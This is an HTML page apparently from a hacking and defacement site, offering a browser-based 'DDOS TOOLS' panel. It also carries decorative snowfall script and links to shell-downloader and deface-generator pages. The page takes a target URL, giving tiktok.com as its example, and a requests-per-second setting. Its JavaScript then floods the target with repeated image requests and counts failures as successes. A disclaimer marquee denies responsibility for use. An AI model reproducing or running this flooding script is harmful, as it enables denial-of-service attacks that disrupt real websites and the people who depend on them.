<!--
--  Downloaded from : https://haxor.my.id/save/Ntddos.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<!--
-              Uploaded on : https://haxor.my.id/?open=ddos.html
-             Official Web : https://prinsh.com
-         Shell Downloader : https://shell.prinsh.com
-   Script Deface Uploader : https://haxor.my.id
-  Script Deface Generator : https://script-deface-generator.prinsh.com 
-->

<html>
 <head> 
  <style>
body { background:#000; color:#FFF; }
a {
color: blue;
}
</style> 
 </head>
 <body style="background-color:black; color:#FFFFFF;">
  <center> 
   <script type="text/javascript">

var snowmax=35
var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
var snowletter="*"
var sinkspeed=5.6
var snowmaxsize=50
var snowminsize=8
var snowingzone=1

// Do not edit below this line
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
var x_mv=new Array();
var crds=new Array();
var lftrght=new Array();
var browserinfos=navigator.userAgent 
var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
var ns6=document.getElementById&&!document.all
var opera=browserinfos.match(/Opera/)  
var browserok=ie5||ns6||opera

function randommaker(range) {		
	rand=Math.floor(range*Math.random())
    return rand
}

function initsnow() {
	if (ie5 || opera) {
		marginbottom = document.body.clientHeight
		marginright = document.body.clientWidth
	}
	else if (ns6) {
		marginbottom = window.innerHeight
		marginright = window.innerWidth
	}
	var snowsizerange=snowmaxsize-snowminsize
	for (i=0;i<=snowmax;i++) {
		crds[i] = 0;                      
    	lftrght[i] = Math.random()*15;         
    	x_mv[i] = 0.03 + Math.random()/10;
		snow[i]=document.getElementById("s"+i)
		snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
		snow[i].size=randommaker(snowsizerange)+snowminsize
		snow[i].style.fontSize=snow[i].size
		snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
		snow[i].sink=sinkspeed*snow[i].size/5
		if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
		if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
		if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
		if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
		snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
		snow[i].style.left=snow[i].posx
		snow[i].style.top=snow[i].posy
	}
	movesnow()
}

function movesnow() {
	for (i=0;i<=snowmax;i++) {
		crds[i] += x_mv[i];
		snow[i].posy+=snow[i].sink
		snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
		snow[i].style.top=snow[i].posy
		
		if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
			if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
			if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
			if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
			if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
			snow[i].posy=0
		}
	}
	var timer=setTimeout("movesnow()",50)
}

for (i=0;i<=snowmax;i++) {
	document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
}
if (browserok) {
	window.onload=initsnow
}
</script>
   <span id="s0" style="position: absolute; top: 101.04px; font-family: &quot;Arial Black&quot;; font-size: 42px; color: rgb(243, 243, 243); left: 616.114px;">*</span>
   <span id="s1" style="position: absolute; top: 340.84px; font-family: Times; font-size: 32px; color: rgb(170, 170, 204); left: 124.248px;">*</span>
   <span id="s2" style="position: absolute; top: 338.28px; font-family: Times; font-size: 19px; color: rgb(204, 204, 221); left: 263.977px;">*</span>
   <span id="s3" style="position: absolute; top: 555.2px; font-family: &quot;Arial Narrow&quot;; font-size: 35px; color: rgb(221, 221, 255); left: 530.16px;">*</span>
   <span id="s4" style="position: absolute; top: 440.24px; font-family: &quot;Comic Sans MS&quot;; font-size: 27px; color: rgb(243, 243, 243); left: 219.523px;">*</span>
   <span id="s5" style="position: absolute; top: 503.44px; font-family: &quot;Arial Narrow&quot;; font-size: 12px; color: rgb(204, 204, 221); left: 701.245px;">*</span>
   <span id="s6" style="position: absolute; top: 172.68px; font-family: &quot;Comic Sans MS&quot;; font-size: 39px; color: rgb(221, 221, 255); left: 530.409px;">*</span>
   <span id="s7" style="position: absolute; top: 135.44px; font-family: &quot;Arial Narrow&quot;; font-size: 37px; color: rgb(221, 221, 255); left: 504.845px;">*</span>
   <span id="s8" style="position: absolute; top: 298.32px; font-family: &quot;Arial Narrow&quot;; font-size: 36px; color: rgb(204, 204, 221); left: 682.207px;">*</span>
   <span id="s9" style="position: absolute; top: 397px; font-family: Times; font-size: 25px; color: rgb(170, 170, 204); left: 568.406px;">*</span>
   <span id="s10" style="position: absolute; top: 105.2px; font-family: &quot;Comic Sans MS&quot;; font-size: 10px; color: rgb(240, 255, 255); left: 586.134px;">*</span>
   <span id="s11" style="position: absolute; top: 480.04px; font-family: &quot;Arial Black&quot;; font-size: 17px; color: rgb(204, 204, 221); left: 525.699px;">*</span>
   <span id="s12" style="position: absolute; top: 86.88px; font-family: &quot;Arial Black&quot;; font-size: 24px; color: rgb(243, 243, 243); left: 62.2519px;">*</span>
   <span id="s13" style="position: absolute; top: 246px; font-family: &quot;Comic Sans MS&quot;; font-size: 25px; color: rgb(240, 255, 255); left: 101.733px;">*</span>
   <span id="s14" style="position: absolute; top: 80.32px; font-family: Times; font-size: 36px; color: rgb(221, 221, 255); left: 517.314px;">*</span>
   <span id="s15" style="position: absolute; top: 68.44px; font-family: &quot;Comic Sans MS&quot;; font-size: 12px; color: rgb(204, 204, 221); left: 330.236px;">*</span>
   <span id="s16" style="position: absolute; top: 377.8px; font-family: &quot;Arial Black&quot;; font-size: 40px; color: rgb(170, 170, 204); left: 289.072px;">*</span>
   <span id="s17" style="position: absolute; top: 427.76px; font-family: &quot;Arial Black&quot;; font-size: 23px; color: rgb(221, 221, 255); left: 484.407px;">*</span>
   <span id="s18" style="position: absolute; top: 510.64px; font-family: &quot;Arial Narrow&quot;; font-size: 47px; color: rgb(170, 170, 204); left: 304.767px;">*</span>
   <span id="s19" style="position: absolute; top: 399.32px; font-family: &quot;Arial Black&quot;; font-size: 36px; color: rgb(221, 221, 255); left: 406.398px;">*</span>
   <span id="s20" style="position: absolute; top: 500.72px; font-family: &quot;Arial Black&quot;; font-size: 31px; color: rgb(221, 221, 255); left: 60.3422px;">*</span>
   <span id="s21" style="position: absolute; top: 382.8px; font-family: &quot;Arial Black&quot;; font-size: 40px; color: rgb(243, 243, 243); left: 287.271px;">*</span>
   <span id="s22" style="position: absolute; top: 74.32px; font-family: Times; font-size: 36px; color: rgb(204, 204, 221); left: 98.7293px;">*</span>
   <span id="s23" style="position: absolute; top: 72.4px; font-family: &quot;Comic Sans MS&quot;; font-size: 45px; color: rgb(243, 243, 243); left: 626.138px;">*</span>
   <span id="s24" style="position: absolute; top: 571.32px; font-family: &quot;Comic Sans MS&quot;; font-size: 11px; color: rgb(204, 204, 221); left: 372.559px;">*</span>
   <span id="s25" style="position: absolute; top: 320.76px; font-family: &quot;Comic Sans MS&quot;; font-size: 48px; color: rgb(170, 170, 204); left: 98.4091px;">*</span>
   <span id="s26" style="position: absolute; top: 130.72px; font-family: Times; font-size: 31px; color: rgb(204, 204, 221); left: 17.9536px;">*</span>
   <span id="s27" style="position: absolute; top: 168.84px; font-family: Times; font-size: 32px; color: rgb(240, 255, 255); left: 664.89px;">*</span>
   <span id="s28" style="position: absolute; top: 543.32px; font-family: Times; font-size: 11px; color: rgb(240, 255, 255); left: 542.677px;">*</span>
   <span id="s29" style="position: absolute; top: 537.04px; font-family: &quot;Comic Sans MS&quot;; font-size: 42px; color: rgb(170, 170, 204); left: 120.067px;">*</span>
   <span id="s30" style="position: absolute; top: 138.16px; font-family: &quot;Arial Narrow&quot;; font-size: 18px; color: rgb(240, 255, 255); left: 270.313px;">*</span>
   <span id="s31" style="position: absolute; top: 136px; font-family: &quot;Arial Narrow&quot;; font-size: 25px; color: rgb(240, 255, 255); left: 17.4184px;">*</span>
   <span id="s32" style="position: absolute; top: 465.76px; font-family: &quot;Comic Sans MS&quot;; font-size: 23px; color: rgb(221, 221, 255); left: 2.54719px;">*</span>
   <span id="s33" style="position: absolute; top: 445.88px; font-family: Times; font-size: 49px; color: rgb(240, 255, 255); left: 466.156px;">*</span>
   <span id="s34" style="position: absolute; top: 256.28px; font-family: &quot;Comic Sans MS&quot;; font-size: 19px; color: rgb(170, 170, 204); left: 117.449px;">*</span>
   <span id="s35" style="position: absolute; top: 380.92px; font-family: &quot;Arial Black&quot;; font-size: 16px; color: rgb(243, 243, 243); left: 640.471px;">*</span> 
   <title>DDOS ONLINE</title> 
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> 
   <br> 
   <center>
    <font size="7" color="red">DDOS TOOLS VisualXcomunity </font>
   </center> 
   <marquee behavior="alternate" scrollamount="5" style="border:1px solid;" width="80%"><font color="red" face="courier">-=|[ PLEASE USE THIS TOLS CORRECTLY || I AM NOT RESPONSIBLE FOR WHAT YOU DO!  ]|=-</center></font></marquee></div>
   <center>
    <img src="https://i.ibb.co.com/4PsfrJQ/IMG-20241002-WA0707-removebg-preview.png" width="500" height="500">
   </center> 
   <br>
   <br> 
   <div style="position:absolute; width:50%; height:50%;"> 
    <div style="width:490px; height:326px; position:absolute;"> 
    </div> 
    <font face="courier new" color="white" style="red;"> 
     <center style="width:240px; height:100px; position:absolute;left:200px;"> 
      <fieldset style="width:100%; height:110%;"> 
       <legend*>
        PNT 1:PNT WEB 
        <label><br> <br><br><input id="targetURL" style="width:100%;" value=""></label> 
        <!-- disabled="true" --> 
        <br> 
        <br> 
        <small>Contoh:http://www.tiktok.com</small> 
       </legend*>
      </fieldset> 
     </center> 
     <div style="width:240px; height:100px; position:absolute; left:480px;"> 
      <fieldset style="width:100%; height:100%;"> 
       <legend>PNT DDOS</legend> 
       <button id="fireButton" style="background-color:black; border-color:#FFF; color:#FFF; width:240px; height:70px;">Start</button> 
      </fieldset> 
     </div> 
     <div style="width:240px; height:160px; position:absolute; left:200px; top:150px;"> 
      <fieldset style="width:100%; height:100%;"> 
       <legend>PNT 2 </legend> 
       <label>Request perdetik:<input style="width:40px;" id="rps" value="100"></label>
       <br> 
       <br> 
       <br> 
       <p> <label>Message: <br><input style="width:100%;" id="message" value=""></label> </p>
      </fieldset> 
     </div> 
     <div style="width:240px; height:160px; position:absolute; left:200px; top:150px;"> 
      <fieldset style="width:100%; height:100%;"> 
       <legend>DDOS 2 </legend> 
       <label>Request perdetik:<input style="width:40px;" id="rps" value="100"></label>
       <br> 
       <br> 
       <br> 
              <p> <label>Message: <br><input style="width:100%;" id="message" value=""></label> </p>
                    </fieldset> 
     </div> 
     <div style="width:240px; height:160px;  position:absolute; left:480px; top:150px;"> 
      <fieldset style="width:100%; height:100%;"> 
       <legend>PNT REQUEST:</legend> 
       <dl> 
        <dt>
         REQUESTED:
        </dt> 
        <dd id="requestedCtr">
         0
        </dd> 
        <dt style="color: green;">
         REQUEST OK:
        </dt> 
        <dd id="succeededCtr">
         0
        </dd> 
        <dt style="color: red;">
         REQUEST FAILED:
        </dt> 
        <dd id="failedCtr">
         0
        </dd> 
       </dl> 
      </fieldset> 
     </div><p></p></font>
   </div>
  </center>
  <font face="courier new" color="white" style="red;"> <script>
            (function () {
                var fireInterval;
                var isFiring = false;
                var requestedCtrNode = document.getElementById("requestedCtr"),
                    succeededCtrNode = document.getElementById("succeededCtr"),
                    failedCtrNode = document.getElementById("failedCtr"),
                    targetURLNode = document.getElementById("targetURL"),
                    fireButton = document.getElementById("fireButton"),
                    messageNode = document.getElementById("message"),
                    rpsNode = document.getElementById("rps"),
                    timeoutNode = document.getElementById("timeout");
                var targetURL = targetURLNode.value;
                targetURLNode.onchange = function () {
                    targetURL = this.value;
                };
                var requestsHT = {}; // requests hash table, may come in handy later
                var requestedCtr = 0,
                    succeededCtr = 0,
                    failedCtr = 0;
                var makeHttpRequest = function () {
                                            if (requestedCtr > failedCtr + succeededCtr + 1000) { //Allow no more than 9999999 hung requests
                                                    return;
                                            };
 
                        var rID =Number(new Date());
                        var img = new Image();
                        img.onerror = function () { onFail(rID); };
                        img.onabort = function () { onFail(rID); };
                        img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
 
                                            img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
                        requestsHT[rID] = img;
                        onRequest(rID);
                    };
 
                var onRequest = function (rID) {
                        requestedCtr++;
                        requestedCtrNode.innerHTML = requestedCtr;
                    };
 
                var onComplete = function (rID) {
                        delete requestsHT[rID];
                    };
 
                var onFail = function (rID) {
                       // failedCtr++;
                        //failedCtrNode.innerHTML = failedCtr;
 
                                            succeededCtr++; //Seems like the url will always fail it it isn't an image
                        succeededCtrNode.innerHTML = succeededCtr;
                        delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
                    };
 
                var onSuccess = function (rID) {
                        succeededCtr++;
                        succeededCtrNode.innerHTML = succeededCtr;
                        delete requestsHT[rID];
                    };
 
                fireButton.onclick = function () {
                    if (isFiring) {
                        clearInterval(fireInterval);
                        isFiring = false;
                        this.innerHTML = "START";
                    } else {
                        isFiring = true;
                        this.innerHTML = "Stop flooding";
 
                        fireInterval = setInterval(makeHttpRequest, (9999999 / parseInt(rpsNode.value) | 0));
                    }
                };
 
            })();
 
    isFiring = true;
    document.getElementById("fireButton").innerHTML = "Start";
    fireInterval = setInterval(makeHttpRequest, (9999999 / parseInt(document.getElementById("rps").value) | 0));
        </script><p></p> </font>
 </body>
</html>